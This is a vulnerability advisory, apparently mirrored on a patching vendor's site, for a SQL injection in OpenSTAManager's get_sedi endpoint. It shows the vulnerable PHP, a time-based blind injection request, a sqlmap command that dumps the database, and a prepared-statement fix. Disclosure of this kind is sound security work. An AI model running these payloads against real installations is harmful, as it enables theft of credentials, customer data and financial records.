CVE

CVE-2025-69213

OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)

CVE

CVE-2025-69213

OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)

Summary

A SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access.

Proof of Concept

Vulnerable Code

File: modules/anagrafiche/ajax/complete.php:28

case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
          FROM an_sedi 
          WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);

Data Flow

Source: $_GET['idanagrafica'] → get('idanagrafica')
Vulnerable: User input concatenated directly into SQL query with single quotes
Sink: $dbo->fetchArray($q) executes the malicious query

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>

SQLMap Exploitation:

sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12

Impact

Data Exfiltration: Complete database extraction including user credentials, customer data, financial records
Privilege Escalation: Modification of zz_users table to gain admin access
Data Integrity: Unauthorized modification or deletion of records
Potential RCE: Via SELECT ... INTO OUTFILE if file permissions allow

Affected Versions

OpenSTAManager: Verified in latest version (as of December 2025)
All versions using this endpoint are likely affected

Remediation

Replace direct concatenation with prepared statements:

Before:

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

After:

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Credit

Discovered by: Łukasz Rybak

Package Versions Affected

No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading

Detect compatible fix

Apply safe remediation

Fix with a single pull request

CVSS Version

8.7

4.0

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Related Resources

No items found.

References

https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg, https://nvd.nist.gov/vuln/detail/CVE-2025-69213, https://github.com/devcode-it/openstamanager

Severity

8.8

CVSS Score

Basic Information

Ecosystem

Base CVSS

8.8

EPSS Probability

0.00039%

EPSS Percentile

0.11452%

Introduced Version

Fix Available

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.

Fix Without Upgrading

Get a Demo

Let's Patch It!

CVE-2025-69213

CVE-2025-69213

Summary

Proof of Concept

Vulnerable Code

Data Flow

Exploit

Impact

Affected Versions

Remediation

Credit

Package Versions Affected

Automatically patch vulnerabilities without upgrading

CVSS Version

Related Resources

References

Severity

8.8

Basic Information

Fix Critical Vulnerabilities Instantly